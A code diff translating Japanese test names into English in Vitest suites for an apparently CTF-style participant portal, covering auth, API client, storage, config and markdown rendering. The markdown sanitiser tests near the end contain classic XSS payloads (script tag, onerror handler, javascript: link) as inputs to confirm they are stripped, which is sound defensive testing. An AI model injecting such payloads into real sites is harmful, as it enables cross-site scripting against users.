-    it("Home に redirect されサインイン画面は表示されないべき (= 黙々 team 切替の防止)", async () => {
+  describe("when re-accessing /login while already logged in (Issue #496)", () => {
+    it("should redirect to Home and not show the sign-in screen (= prevent silent team switching)", async () => {
       const user = userEvent.setup();
       // 1 度ログインして session を作る
       const { unmount } = renderApp("/login");

--- a/apps/participant-portal/test/api/portal-client.test.ts
+++ b/apps/participant-portal/test/api/portal-client.test.ts
@@ -33,7 +33,7 @@ const VIEW = {
 describe("getPortalMe", () => {
   afterEach(() => vi.restoreAllMocks());
 
-  it("apiBaseUrl + /portal/me を Bearer 付きで GET し view を返すべき", async () => {
+  it("should GET apiBaseUrl + /portal/me with Bearer and return the view", async () => {
     const fetchMock = vi.fn().mockImplementation(() =>
       Promise.resolve(
         new Response(JSON.stringify(VIEW), {
@@ -54,7 +54,7 @@ describe("getPortalMe", () => {
     expect((init.headers as Record<string, string>).authorization).toBe(`Bearer ${KEY}`);
   });
 
-  it("末尾スラッシュの有無で URL は同じになるべき", async () => {
+  it("should produce the same URL regardless of trailing slash", async () => {
     const fetchMock = vi
       .fn()
       .mockImplementation(() =>
@@ -70,12 +70,12 @@ describe("getPortalMe", () => {
     expect(url1).toBe(url2);
   });
 
-  it("401 は PortalAuthError を投げるべき", async () => {
+  it("should throw PortalAuthError on 401", async () => {
     vi.stubGlobal("fetch", vi.fn().mockResolvedValue(new Response("", { status: 401 })));
     await expect(getPortalMe("https://x", KEY)).rejects.toBeInstanceOf(PortalAuthError);
   });
 
-  it("500 は PortalNetworkError (status と body 含む)", async () => {
+  it("should throw PortalNetworkError on 500 (with status and body)", async () => {
     vi.stubGlobal(
       "fetch",
       vi.fn().mockImplementation(() => Promise.resolve(new Response("ddb down", { status: 500 }))),
@@ -87,7 +87,7 @@ describe("getPortalMe", () => {
     });
   });
 
-  it("AbortSignal を fetch に伝播するべき", async () => {
+  it("should propagate AbortSignal to fetch", async () => {
     const fetchMock = vi
       .fn()
       .mockImplementation(() =>
@@ -104,7 +104,7 @@ describe("getPortalMe", () => {
 describe("getNotifications", () => {
   afterEach(() => vi.restoreAllMocks());
 
-  it("/portal/me/notifications を Bearer 付きで GET し response を返すべき", async () => {
+  it("should GET /portal/me/notifications with Bearer and return the response", async () => {
     const payload = {
       eventId: "01HZX",
       items: [
@@ -133,7 +133,7 @@ describe("getNotifications", () => {
     expect(url.toString()).toBe("https://api.example.com/portal/me/notifications");
   });
 
-  it("404 (no_event) は undefined を返すべき (旧 jobId-based deployment 互換)", async () => {
+  it("should return undefined on 404 (no_event) (legacy jobId-based deployment compatibility)", async () => {
     const fetchMock = vi.fn().mockResolvedValue(
       new Response(JSON.stringify({ error: "no_event" }), {
         status: 404,
@@ -144,7 +144,7 @@ describe("getNotifications", () => {
     expect(await getNotifications("https://x", KEY)).toBeUndefined();
   });
 
-  it("limit を渡したら ?limit=N で query に乗せる", async () => {
+  it("should include ?limit=N in the query when limit is passed", async () => {
     const fetchMock = vi
       .fn()
       .mockResolvedValue(
@@ -160,7 +160,7 @@ describe("getNotifications", () => {
 describe("getDeployLogs", () => {
   afterEach(() => vi.restoreAllMocks());
 
-  it("jobId / nextToken / limit を query に乗せて CodeBuild log response を返すべき", async () => {
+  it("should put jobId / nextToken / limit on the query and return the CodeBuild log response", async () => {
     const payload = {
       jobId: "01H8XGJWBWBAQ4N6RZHM4S2KMV",
       buildStatus: "IN_PROGRESS",
@@ -196,7 +196,7 @@ describe("getDeployLogs", () => {
     expect((init.headers as Record<string, string>).authorization).toBe(`Bearer ${KEY}`);
   });
 
-  it("400 invalid_jobid は PortalValidationError として扱うべき", async () => {
+  it("should treat 400 invalid_jobid as PortalValidationError", async () => {
     vi.stubGlobal(
       "fetch",
       vi.fn().mockResolvedValue(
@@ -216,7 +216,7 @@ describe("getDeployLogs", () => {
 describe("listProblemEndpoints (ADR-012 Phase 3.A / Issue #607)", () => {
   afterEach(() => vi.restoreAllMocks());
 
-  it("/portal/me/problems/<id>/endpoints を Bearer 付きで GET すべき", async () => {
+  it("should GET /portal/me/problems/<id>/endpoints with Bearer", async () => {
     const payload = {
       teamId: "team-x",
       endpoints: [
@@ -245,7 +245,7 @@ describe("listProblemEndpoints (ADR-012 Phase 3.A / Issue #607)", () => {
     expect((init.headers as Record<string, string>).authorization).toBe(`Bearer ${KEY}`);
   });
 
-  it("problemId に special char を含むときも URL encode して送るべき", async () => {
+  it("should URL encode problemId when it contains special chars", async () => {
     const fetchMock = vi
       .fn()
       .mockResolvedValue(
@@ -262,7 +262,7 @@ describe("listProblemEndpoints (ADR-012 Phase 3.A / Issue #607)", () => {
 describe("putProblemEndpointOverride", () => {
   afterEach(() => vi.restoreAllMocks());
 
-  it("POST /portal/me/problems/<id>/endpoints/<slot> { url } を送り response を返すべき", async () => {
+  it("should POST /portal/me/problems/<id>/endpoints/<slot> { url } and return the response", async () => {
     const payload = {
       teamId: "team-x",
       endpoints: [{ slot: "users", overridable: true, effectiveUrl: "https://my-lambda.example/" }],
@@ -284,7 +284,7 @@ describe("putProblemEndpointOverride", () => {
     expect(JSON.parse(init.body as string)).toEqual({ url: "https://my-lambda.example/" });
   });
 
-  it("400 invalid_url は PortalValidationError(errorCode=invalid_url) を投げるべき", async () => {
+  it("should throw PortalValidationError(errorCode=invalid_url) on 400 invalid_url", async () => {
     vi.stubGlobal(
       "fetch",
       vi.fn().mockResolvedValue(
@@ -303,7 +303,7 @@ describe("putProblemEndpointOverride", () => {
     }
   });
 
-  it("409 slot_not_overridable も PortalValidationError として扱うべき", async () => {
+  it("should treat 409 slot_not_overridable as PortalValidationError", async () => {
     vi.stubGlobal(
       "fetch",
       vi.fn().mockResolvedValue(
@@ -322,7 +322,7 @@ describe("putProblemEndpointOverride", () => {
 describe("submitFlag", () => {
   afterEach(() => vi.restoreAllMocks());
 
-  it("409 scoring_not_started は PortalScoringGateError として startsAt を保持すべき", async () => {
+  it("should retain startsAt as PortalScoringGateError on 409 scoring_not_started", async () => {
     vi.stubGlobal(
       "fetch",
       vi.fn().mockImplementation(() =>
@@ -354,7 +354,7 @@ describe("submitFlag", () => {
 describe("deleteProblemEndpointOverride", () => {
   afterEach(() => vi.restoreAllMocks());
 
-  it("DELETE /portal/me/problems/<id>/endpoints/<slot> を送り response を返すべき", async () => {
+  it("should DELETE /portal/me/problems/<id>/endpoints/<slot> and return the response", async () => {
     const payload = { teamId: "team-x", endpoints: [{ slot: "users", overridable: true }] };
     const fetchMock = vi
       .fn()
@@ -368,13 +368,13 @@ describe("deleteProblemEndpointOverride", () => {
 });
 
 describe("TERMINAL_STATUSES", () => {
-  it("COMPLETE / FAILED / DELETED を含むべき (poll 停止判定用)", () => {
+  it("should include COMPLETE / FAILED / DELETED (for poll stop decision)", () => {
     expect(TERMINAL_STATUSES.has("COMPLETE")).toBe(true);
     expect(TERMINAL_STATUSES.has("FAILED")).toBe(true);
     expect(TERMINAL_STATUSES.has("DELETED")).toBe(true);
   });
 
-  it("PENDING / IN_PROGRESS / DELETING は含まないべき", () => {
+  it("should not include PENDING / IN_PROGRESS / DELETING", () => {
     expect(TERMINAL_STATUSES.has("PENDING")).toBe(false);
     expect(TERMINAL_STATUSES.has("IN_PROGRESS")).toBe(false);
     expect(TERMINAL_STATUSES.has("DELETING")).toBe(false);

--- a/apps/participant-portal/test/auth/AuthProvider.test.tsx
+++ b/apps/participant-portal/test/auth/AuthProvider.test.tsx
@@ -31,13 +31,13 @@ describe("AuthProvider", () => {
     vi.restoreAllMocks();
   });
 
-  it("初期状態は ready=true / session なしであるべき", () => {
+  it("should be ready=true with no session in initial state", () => {
     const { result } = renderAuth(devConfig);
     expect(result.current.ready).toBe(true);
     expect(result.current.session).toBeNull();
   });
 
-  it("dev config で login すると mock session が発行されるべき", async () => {
+  it("should issue a mock session on login with dev config", async () => {
     const { result } = renderAuth(devConfig);
     await act(async () => {
       await result.current.login("abc-123-team");
@@ -46,7 +46,7 @@ describe("AuthProvider", () => {
     expect(result.current.session?.teamId).toMatch(/^team-/);
   });
 
-  it("空白のみのキーを渡したら throw、session は変わらないべき", async () => {
+  it("should throw and not change session when passed a whitespace-only key", async () => {
     const { result } = renderAuth(devConfig);
     await act(async () => {
       // Issue #873: regex regression を回避。
@@ -57,7 +57,7 @@ describe("AuthProvider", () => {
     expect(result.current.session).toBeNull();
   });
 
-  it("Unicode (日本語) のキーでもクラッシュせず session 発行できるべき", async () => {
+  it("should issue a session without crashing for a Unicode (Japanese) key", async () => {
     const { result } = renderAuth(devConfig);
     await act(async () => {
       await result.current.login("日本語キー");
@@ -66,7 +66,7 @@ describe("AuthProvider", () => {
     expect(result.current.session?.teamId).toMatch(/^team-/);
   });
 
-  it("logout で session が消えるべき", async () => {
+  it("should clear the session on logout", async () => {
     const { result } = renderAuth(devConfig);
     await act(async () => {
       await result.current.login("abc-123-team");
@@ -78,7 +78,7 @@ describe("AuthProvider", () => {
     expect(result.current.session).toBeNull();
   });
 
-  it("backend mode: /portal/me を Bearer 付きで叩き session を構築するべき", async () => {
+  it("backend mode: should call /portal/me with Bearer and build a session", async () => {
     vi.stubGlobal(
       "fetch",
       vi.fn().mockResolvedValue(
@@ -118,7 +118,7 @@ describe("AuthProvider", () => {
     expect(result.current.session?.expiresAt).toBe(1_700_000_000_000);
   });
 
-  it("backend mode: 401 で PortalAuthError を throw、session は変わらないべき", async () => {
+  it("backend mode: should throw PortalAuthError on 401 and not change session", async () => {
     vi.stubGlobal("fetch", vi.fn().mockResolvedValue(new Response("", { status: 401 })));
     const { result } = renderAuth(prodConfig);
     await act(async () => {
@@ -130,12 +130,12 @@ describe("AuthProvider", () => {
     expect(result.current.session).toBeNull();
   });
 
-  it("Provider 外で useAuth() を呼んだら error を throw するべき", () => {
+  it("should throw an error when useAuth() is called outside the Provider", () => {
     expect(() => renderHook(() => useAuth())).toThrow(/AuthProvider/);
   });
 
   describe("Issue #859: idle timeout (6 hours)", () => {
-    it("5h 59min 経過しても logout しないべき (= 競技中の長時間 idle を許容)", async () => {
+    it("should not logout after 5h 59min elapsed (= tolerate long idle during competition)", async () => {
       vi.useFakeTimers();
       try {
         const { result } = renderAuth(devConfig);
@@ -155,7 +155,7 @@ describe("AuthProvider", () => {
       }
     });
 
-    it("6h 無操作で auto-logout するべき (= 競技後の安全弁)", async () => {
+    it("should auto-logout after 6h of inactivity (= safety valve after competition)", async () => {
       vi.useFakeTimers();
       try {
         const { result } = renderAuth(devConfig);
@@ -174,7 +174,7 @@ describe("AuthProvider", () => {
       }
     });
 
-    it("user 操作で 6h timer は reset されるべき", async () => {
+    it("should reset the 6h timer on user activity", async () => {
       vi.useFakeTimers();
       try {
         const { result } = renderAuth(devConfig);

--- a/apps/participant-portal/test/auth/TeamViewProvider.test.ts
+++ b/apps/participant-portal/test/auth/TeamViewProvider.test.ts
@@ -26,7 +26,7 @@ function teamView(statuses: readonly ParticipantTeamView["problems"][number]["st
 }
 
 describe("TeamViewProvider refresh decisions", () => {
-  it("portal/me 成功時は view と polling 停止判定を返すべき", () => {
+  it("should return view and polling stop decision on portal/me success", () => {
     const active = teamView(["COMPLETE", "FAILED"]);
     expect(toPortalMeRefreshDecision({ status: "fulfilled", value: active })).toEqual({
       kind: "view",
@@ -42,7 +42,7 @@ describe("TeamViewProvider refresh decisions", () => {
     });
   });
 
-  it("portal/me の認証エラーは logout 判定にすべき", () => {
+  it("should treat portal/me auth error as a logout decision", () => {
     expect(
       toPortalMeRefreshDecision({ status: "rejected", reason: new PortalAuthError() }),
     ).toEqual({
@@ -50,7 +50,7 @@ describe("TeamViewProvider refresh decisions", () => {
     });
   });
 
-  it("portal/me の通常エラーは message に変換すべき", () => {
+  it("should convert generic portal/me errors to a message", () => {
     expect(toPortalMeRefreshDecision({ status: "rejected", reason: new Error("boom") })).toEqual({
       kind: "error",
       message: "boom",
@@ -61,7 +61,7 @@ describe("TeamViewProvider refresh decisions", () => {
     });
   });
 
-  it("leaderboard 成功時は no-event と通常更新を区別すべき", () => {
+  it("should distinguish no-event from regular updates on leaderboard success", () => {
     expect(toLeaderboardRefreshDecision({ status: "fulfilled", value: undefined })).toEqual({
       kind: "no-event",
     });
@@ -73,7 +73,7 @@ describe("TeamViewProvider refresh decisions", () => {
     });
   });
 
-  it("leaderboard の認証エラーは無視し通常エラーだけ message に変換すべき", () => {
+  it("should ignore leaderboard auth errors and convert only generic errors to a message", () => {
     expect(
       toLeaderboardRefreshDecision({ status: "rejected", reason: new PortalAuthError() }),
     ).toEqual({

--- a/apps/participant-portal/test/auth/storage.test.ts
+++ b/apps/participant-portal/test/auth/storage.test.ts
@@ -31,11 +31,11 @@ describe("storage", () => {
   });
 
   describe("loadSession", () => {
-    it("初期状態では null を返すべき", () => {
+    it("should return null in initial state", () => {
       expect(loadSession()).toBeNull();
     });
 
-    it("有効な session が保存されているなら復元できるべき", () => {
+    it("should restore a valid saved session", () => {
       const s = sample();
       saveSession(s);
       const loaded = loadSession();
@@ -44,20 +44,20 @@ describe("storage", () => {
       expect(loaded?.sessionToken).toBe("abc.def.ghi");
     });
 
-    it("expiresAt が過去の session は null にして key を消すべき", () => {
+    it("should return null and delete the key when expiresAt is in the past", () => {
       const s: ParticipantSession = { ...sample(), expiresAt: Date.now() - 1 };
       saveSession(s);
       expect(loadSession()).toBeNull();
       expect(localStorage.getItem(STORAGE_KEY)).toBeNull();
     });
 
-    it("不正な JSON が入っていたら null + 削除を返すべき", () => {
+    it("should return null and delete when invalid JSON is stored", () => {
       localStorage.setItem(STORAGE_KEY, "not-a-json");
       expect(loadSession()).toBeNull();
       expect(localStorage.getItem(STORAGE_KEY)).toBeNull();
     });
 
-    it("schema 違反 (必須フィールド欠落) なら null + 削除を返すべき", () => {
+    it("should return null and delete on schema violation (missing required fields)", () => {
       localStorage.setItem(
         STORAGE_KEY,
         JSON.stringify({ sessionToken: "x", teamId: "y" }), // 多くのフィールドが欠落
@@ -71,12 +71,12 @@ describe("storage", () => {
       );
     });
 
-    it("expiresAt が文字列 (型違反) なら null + 削除を返すべき", () => {
+    it("should return null and delete when expiresAt is a string (type violation)", () => {
       localStorage.setItem(STORAGE_KEY, JSON.stringify({ ...sample(), expiresAt: "later" }));
       expect(loadSession()).toBeNull();
     });
 
-    it("`localStorage` に保存され、tab を閉じても (= sessionStorage が空でも) 復元できるべき", () => {
+    it("should be stored in `localStorage` and survive closing the tab (= even when sessionStorage is empty)", () => {
       saveSession(sample());
       sessionStorage.clear(); // tab を閉じた相当
       const loaded = loadSession();
@@ -85,7 +85,7 @@ describe("storage", () => {
   });
 
   describe("saveSession", () => {
-    it("schema を満たすなら `localStorage` に保存できるべき", () => {
+    it("should save to `localStorage` when schema is satisfied", () => {
       saveSession(sample());
       const stored = localStorage.getItem(STORAGE_KEY);
       expect(stored).not.toBeNull();
@@ -96,21 +96,21 @@ describe("storage", () => {
       expect(parsed.teamName).toBe("Team Alpha");
     });
 
-    it("`sessionStorage` には保存されないべき (= reload 越しに保たれる契約)", () => {
+    it("should not save to `sessionStorage` (= contract that it persists across reload)", () => {
       saveSession(sample());
       expect(sessionStorage.getItem(STORAGE_KEY)).toBeNull();
     });
   });
 
   describe("clearSession", () => {
-    it("保存済み session を削除できるべき", () => {
+    it("should delete a stored session", () => {
       saveSession(sample());
       clearSession();
       expect(localStorage.getItem(STORAGE_KEY)).toBeNull();
       expect(loadSession()).toBeNull();
     });
 
-    it("何も保存されていない状態でも例外を出さないべき", () => {
+    it("should not throw when nothing is stored", () => {
       expect(() => clearSession()).not.toThrow();
     });
   });

--- a/apps/participant-portal/test/components/AppLayout.test.ts
+++ b/apps/participant-portal/test/components/AppLayout.test.ts
@@ -34,16 +34,16 @@ function leaderboard(entries: LeaderboardResponse["entries"]) {
 }
 
 describe("AppLayout top navigation helpers", () => {
-  it("backend mode では取得済み score を合算表示すべき", () => {
+  it("should display the sum of fetched scores in backend mode", () => {
     expect(formatTopNavScore("backend", teamView([10, 15, -3]))).toBe("22 pt");
   });
 
-  it("backend 未取得または mock mode では score fallback を表示すべき", () => {
+  it("should display the score fallback when backend has not loaded or in mock mode", () => {
     expect(formatTopNavScore("backend", null)).toBe("…");
     expect(formatTopNavScore("dev-mock", teamView([10]))).toBe("—");
   });
 
-  it("backend mode では自チーム rank と総チーム数を表示すべき", () => {
+  it("should display own team rank and total team count in backend mode", () => {
     expect(
       formatTopNavRank(
         "backend",
@@ -72,14 +72,14 @@ describe("AppLayout top navigation helpers", () => {
     ).toBe("1/2");
   });
 
-  it("rank が取得不能な場合は状態に応じた fallback を表示すべき", () => {
+  it("should display a state-appropriate fallback when rank is unavailable", () => {
     expect(formatTopNavRank("dev-mock", null, false)).toBe("—");
     expect(formatTopNavRank("backend", null, true)).toBe("—");
     expect(formatTopNavRank("backend", null, false)).toBe("…");
     expect(formatTopNavRank("backend", leaderboard([]), false)).toBe("…");
   });
 
-  it("対応 locale id だけを受け入れるべき", () => {
+  it("should accept only supported locale ids", () => {
     expect(isSupportedLocaleId("ja")).toBe(true);
     expect(isSupportedLocaleId("en")).toBe(true);
     expect(isSupportedLocaleId("fr")).toBe(false);

--- a/apps/participant-portal/test/config.test.ts
+++ b/apps/participant-portal/test/config.test.ts
@@ -10,7 +10,7 @@ describe("loadConfig", () => {
     globalThis.fetch = realFetch;
   });
 
-  it("/runtime-config.json が 200 で返ったら値を取り出すべき", async () => {
+  it("should extract values when /runtime-config.json returns 200", async () => {
     (globalThis.fetch as ReturnType<typeof vi.fn>).mockResolvedValue({
       ok: true,
       json: async () => ({
@@ -28,7 +28,7 @@ describe("loadConfig", () => {
     expect(cfg.cloudMode).toBe("real");
   });
 
-  it("mode が runtime-config に無いときは fallback の dev-mock になるべき", async () => {
+  it("should fall back to dev-mock when mode is missing from runtime-config", async () => {
     (globalThis.fetch as ReturnType<typeof vi.fn>).mockResolvedValue({
       ok: true,
       json: async () => ({ apiBaseUrl: "https://api.example.com" }),
@@ -38,7 +38,7 @@ describe("loadConfig", () => {
     expect(cfg.cloudMode).toBe("mock");
   });
 
-  it("cloudMode=localstack の runtime-config を読み込むべき", async () => {
+  it("should load runtime-config with cloudMode=localstack", async () => {
     (globalThis.fetch as ReturnType<typeof vi.fn>).mockResolvedValue({
       ok: true,
       json: async () => ({
@@ -56,7 +56,7 @@ describe("loadConfig", () => {
     expect(cfg.localstackEndpoint).toBe("http://localhost:4566");
   });
 
-  it("localstackEndpoint が localhost 以外なら表示用 endpoint として採用しないべき", async () => {
+  it("should not adopt localstackEndpoint as display endpoint when it is not localhost", async () => {
     (globalThis.fetch as ReturnType<typeof vi.fn>).mockResolvedValue({
       ok: true,
       json: async () => ({
@@ -71,7 +71,7 @@ describe("loadConfig", () => {
     expect(cfg.localstackEndpoint).toBeUndefined();
   });
 
-  it("一部キー欠落でも fallback で埋めるべき", async () => {
+  it("should fill missing keys with fallbacks", async () => {
     (globalThis.fetch as ReturnType<typeof vi.fn>).mockResolvedValue({
       ok: true,
       json: async () => ({ apiBaseUrl: "https://x.example/api" }),
@@ -83,7 +83,7 @@ describe("loadConfig", () => {
     expect(cfg.eventRegion).toBe("ap-northeast-1");
   });
 
-  it("404 のときは fallback を返すべき", async () => {
+  it("should return fallback on 404", async () => {
     (globalThis.fetch as ReturnType<typeof vi.fn>).mockResolvedValue({
       ok: false,
       status: 404,
@@ -93,13 +93,13 @@ describe("loadConfig", () => {
     expect(cfg.apiBaseUrl).toContain("dev-mock");
   });
 
-  it("fetch が throw したら fallback を返すべき", async () => {
+  it("should return fallback when fetch throws", async () => {
     (globalThis.fetch as ReturnType<typeof vi.fn>).mockRejectedValue(new Error("network down"));
     const cfg = await loadConfig();
     expect(cfg.apiBaseUrl).toContain("dev-mock");
   });
 
-  it("Issue #871: backend mode で apiBaseUrl が http:// なら fallback に倒れるべき", async () => {
+  it("Issue #871: should fall back when apiBaseUrl is http:// in backend mode", async () => {
     vi.spyOn(console, "error").mockImplementation(() => undefined);
     (globalThis.fetch as ReturnType<typeof vi.fn>).mockResolvedValue({
       ok: true,

--- a/apps/participant-portal/test/lib/category.test.ts
+++ b/apps/participant-portal/test/lib/category.test.ts
@@ -3,31 +3,31 @@ import type { ParticipantScoringInfo } from "../../src/api/portal-client";
 import { categoryOf } from "../../src/lib/category";
 
 describe("categoryOf", () => {
-  it("scoring が undefined なら null を返すべき (= 未分類)", () => {
+  it("should return null when scoring is undefined (= uncategorized)", () => {
     expect(categoryOf(undefined)).toBeNull();
   });
 
-  it("kind=uptime は battle を返すべき", () => {
+  it("should return battle for kind=uptime", () => {
     const scoring: ParticipantScoringInfo = { kind: "uptime", pointsPerSuccess: 5 };
     expect(categoryOf(scoring)).toBe("battle");
   });
 
-  it("kind=flag は challenge を返すべき", () => {
+  it("should return challenge for kind=flag", () => {
     const scoring: ParticipantScoringInfo = { kind: "flag", points: 100 };
     expect(categoryOf(scoring)).toBe("challenge");
   });
 
-  it("kind=phased-polling は battle を返すべき (#688 regression — phased-polling は battle 軸)", () => {
+  it("should return battle for kind=phased-polling (#688 regression — phased-polling is on the battle axis)", () => {
     const scoring: ParticipantScoringInfo = { kind: "phased-polling" };
     expect(categoryOf(scoring)).toBe("battle");
   });
 
-  it("kind=uptime-flat / uptime-multi はいずれも battle を返すべき", () => {
+  it("should return battle for both kind=uptime-flat and uptime-multi", () => {
     expect(categoryOf({ kind: "uptime-flat" })).toBe("battle");
     expect(categoryOf({ kind: "uptime-multi" })).toBe("battle");
   });
 
-  it("kind=attack-detection は battle を返すべき", () => {
+  it("should return battle for kind=attack-detection", () => {
     expect(categoryOf({ kind: "attack-detection" })).toBe("battle");
   });
 });

--- a/apps/participant-portal/test/lib/format.test.ts
+++ b/apps/participant-portal/test/lib/format.test.ts
@@ -10,37 +10,37 @@ import { describeAgo } from "../../src/lib/format";
 const NOW = new Date("2026-05-05T10:00:00.000Z").getTime();
 
 describe("describeAgo", () => {
-  it("undefined / 空文字なら「未採点」を返すべき", () => {
+  it("should return 「未採点」 for undefined / empty string", () => {
     expect(describeAgo(undefined, NOW)).toBe("未採点");
   });
 
-  it("不正な ISO 文字列なら「?」を返すべき (best-effort)", () => {
+  it("should return 「?」 for an invalid ISO string (best-effort)", () => {
     expect(describeAgo("not-a-date", NOW)).toBe("?");
     expect(describeAgo("", NOW)).toBe("未採点");
   });
 
-  it("0 秒前 (= 今) は「0 秒前」", () => {
+  it("should return 「0 秒前」 for 0 seconds ago (= now)", () => {
     expect(describeAgo("2026-05-05T10:00:00.000Z", NOW)).toBe("0 秒前");
   });
 
-  it("60 秒未満は「N 秒前」", () => {
+  it("should render under 60 seconds as 「N 秒前」", () => {
     expect(describeAgo("2026-05-05T09:59:30.000Z", NOW)).toBe("30 秒前");
     expect(describeAgo("2026-05-05T09:59:01.000Z", NOW)).toBe("59 秒前");
   });
 
-  it("60 秒以上 60 分未満は「N 分前」", () => {
+  it("should render 60 seconds to under 60 minutes as 「N 分前」", () => {
     expect(describeAgo("2026-05-05T09:59:00.000Z", NOW)).toBe("1 分前");
     expect(describeAgo("2026-05-05T09:58:00.000Z", NOW)).toBe("2 分前");
     expect(describeAgo("2026-05-05T09:01:00.000Z", NOW)).toBe("59 分前");
   });
 
-  it("60 分以上は「N 時間 M 分前」", () => {
+  it("should render 60 minutes or more as 「N 時間 M 分前」", () => {
     expect(describeAgo("2026-05-05T09:00:00.000Z", NOW)).toBe("1 時間 0 分前");
     expect(describeAgo("2026-05-05T08:30:00.000Z", NOW)).toBe("1 時間 30 分前");
     expect(describeAgo("2026-05-05T07:15:00.000Z", NOW)).toBe("2 時間 45 分前");
   });
 
-  it("未来時刻 (= now より新しい sinceIso) でも 0 秒前として扱うべき (= clock skew 防御)", () => {
+  it("should treat future timestamps (= sinceIso newer than now) as 0 seconds ago (= clock skew defense)", () => {
     expect(describeAgo("2026-05-05T10:01:00.000Z", NOW)).toBe("0 秒前");
   });
 });

--- a/apps/participant-portal/test/lib/notifications-storage.test.ts
+++ b/apps/participant-portal/test/lib/notifications-storage.test.ts
@@ -9,29 +9,29 @@ afterEach(() => localStorage.clear());
 
 describe("notifications-storage", () => {
   describe("loadLastSeenAt / saveLastSeenAt", () => {
-    it("初期状態では null を返すべき", () => {
+    it("should return null in initial state", () => {
       expect(loadLastSeenAt(EV_A)).toBeNull();
     });
 
-    it("saveSession した値を loadSession で取り出せる", () => {
+    it("should retrieve a saved value via loadSession", () => {
       saveLastSeenAt(EV_A, "2026-05-10T14:00:00.000Z");
       expect(loadLastSeenAt(EV_A)).toBe("2026-05-10T14:00:00.000Z");
     });
 
-    it("古い値で上書きしようとしても巻き戻さない (= max 採用)", () => {
+    it("should not roll back when trying to overwrite with an older value (= max wins)", () => {
       saveLastSeenAt(EV_A, "2026-05-10T14:00:00.000Z");
       saveLastSeenAt(EV_A, "2026-05-10T13:00:00.000Z");
       expect(localStorage.getItem(`${KEY_PREFIX}:${EV_A}`)).toBe("2026-05-10T14:00:00.000Z");
     });
 
-    it("空文字 / 空 eventId は無視するべき (graceful)", () => {
+    it("should ignore empty string / empty eventId (graceful)", () => {
       saveLastSeenAt(EV_A, "");
       expect(loadLastSeenAt(EV_A)).toBeNull();
       saveLastSeenAt("", "2026-05-10T14:00:00.000Z");
       expect(loadLastSeenAt("")).toBeNull();
     });
 
-    it("eventId ごとに独立した key で保存される (event 跨ぎで silent 既読化しない)", () => {
+    it("should store under an independent key per eventId (no silent read-marking across events)", () => {
       saveLastSeenAt(EV_A, "2026-05-10T14:00:00.000Z");
       // 別 event は影響を受けない
       expect(loadLastSeenAt(EV_B)).toBeNull();
@@ -48,19 +48,19 @@ describe("notifications-storage", () => {
       { occurredAt: "2026-05-10T12:00:00.000Z" },
     ];
 
-    it("lastSeen が null なら全件未読", () => {
+    it("should mark all items unread when lastSeen is null", () => {
       expect(countUnread(items, null)).toBe(3);
     });
 
-    it("lastSeen より新しい行のみ未読", () => {
+    it("should mark only rows newer than lastSeen as unread", () => {
       expect(countUnread(items, "2026-05-10T13:30:00.000Z")).toBe(1);
     });
 
-    it("lastSeen が最新と同値なら未読 0", () => {
+    it("should return 0 unread when lastSeen equals the latest item", () => {
       expect(countUnread(items, "2026-05-10T14:00:00.000Z")).toBe(0);
     });
 
-    it("空配列なら 0", () => {
+    it("should return 0 for an empty array", () => {
       expect(countUnread([], null)).toBe(0);
     });
   });

--- a/apps/participant-portal/test/lib/slug.test.ts
+++ b/apps/participant-portal/test/lib/slug.test.ts
@@ -2,23 +2,23 @@ import { describe, expect, it } from "vitest";
 import { toAsciiSlug } from "../../src/lib/slug";
 
 describe("toAsciiSlug", () => {
-  it("英数字以外を落とし、lowercase 化するべき", () => {
+  it("should drop non-alphanumerics and lowercase the result", () => {
     expect(toAsciiSlug("Alpha-1!")).toBe("alpha1");
   });
 
-  it("日本語などの非 ASCII 文字は anon にフォールバックするべき", () => {
+  it("should fall back to anon for non-ASCII characters such as Japanese", () => {
     expect(toAsciiSlug("日本語キー")).toBe("anon");
   });
 
-  it("空文字なら anon を返すべき", () => {
+  it("should return anon for empty string", () => {
     expect(toAsciiSlug("")).toBe("anon");
   });
 
-  it("デフォルトで 12 文字に切り詰めるべき", () => {
+  it("should truncate to 12 characters by default", () => {
     expect(toAsciiSlug("A".repeat(50))).toHaveLength(12);
   });
 
-  it("maxLength を渡せばその長さに切り詰めるべき", () => {
+  it("should truncate to the given length when maxLength is passed", () => {
     expect(toAsciiSlug("A".repeat(50), 5)).toBe("aaaaa");
   });
 });

--- a/apps/participant-portal/test/markdown.test.ts
+++ b/apps/participant-portal/test/markdown.test.ts
@@ -7,72 +7,72 @@ import { renderMarkdownToSafeHtml } from "../src/lib/markdown";
  * かつ heading / list / table / code を維持することを pin する。
  */
 describe("renderMarkdownToSafeHtml (Issue #661)", () => {
-  it("heading を <h1> 等の HTML に変換すべき", () => {
+  it("should convert headings to HTML such as <h1>", () => {
     const html = renderMarkdownToSafeHtml("## 学習目的");
     expect(html).toMatch(/<h2[^>]*>学習目的<\/h2>/);
   });
 
-  it("箇条書きを <ul><li> に変換すべき", () => {
+  it("should convert bullet lists to <ul><li>", () => {
     const html = renderMarkdownToSafeHtml("- 一つ目\n- 二つ目");
     expect(html).toContain("<ul>");
     expect(html).toContain("<li>一つ目</li>");
     expect(html).toContain("<li>二つ目</li>");
   });
 
-  it("table を <table> に変換すべき", () => {
+  it("should convert tables to <table>", () => {
     const md = "| a | b |\n|---|---|\n| 1 | 2 |";
     const html = renderMarkdownToSafeHtml(md);
     expect(html).toContain("<table>");
     expect(html).toContain("<th>a</th>");
   });
 
-  it("コードブロックを <pre><code> に変換すべき", () => {
+  it("should convert code blocks to <pre><code>", () => {
     const html = renderMarkdownToSafeHtml("```\nconst x = 1;\n```");
     expect(html).toMatch(/<pre>[\s\S]*<code>[\s\S]*const x = 1;/);
   });
 
-  it("XSS: <script> を剥がすべき", () => {
+  it("XSS: should strip <script>", () => {
     const html = renderMarkdownToSafeHtml("Hello <script>alert(1)</script> world");
     expect(html).not.toContain("<script>");
     expect(html).not.toContain("alert(1)");
   });
 
-  it("XSS: onerror handler を剥がすべき", () => {
+  it("XSS: should strip onerror handler", () => {
     const html = renderMarkdownToSafeHtml('<img src=x onerror="alert(1)">');
     expect(html).not.toContain("onerror");
     expect(html).not.toContain("alert(1)");
   });
 
-  it("XSS: javascript: スキームを剥がすべき", () => {
+  it("XSS: should strip javascript: scheme", () => {
     const html = renderMarkdownToSafeHtml("[click](javascript:alert(1))");
     // marked が href 化、 DOMPurify が javascript: scheme を中和
     expect(html).not.toMatch(/href="javascript:/);
   });
 
-  it("inline code を <code> 化すべき", () => {
+  it("should wrap inline code in <code>", () => {
     const html = renderMarkdownToSafeHtml("use `npm install` to ...");
     expect(html).toContain("<code>npm install</code>");
   });
 
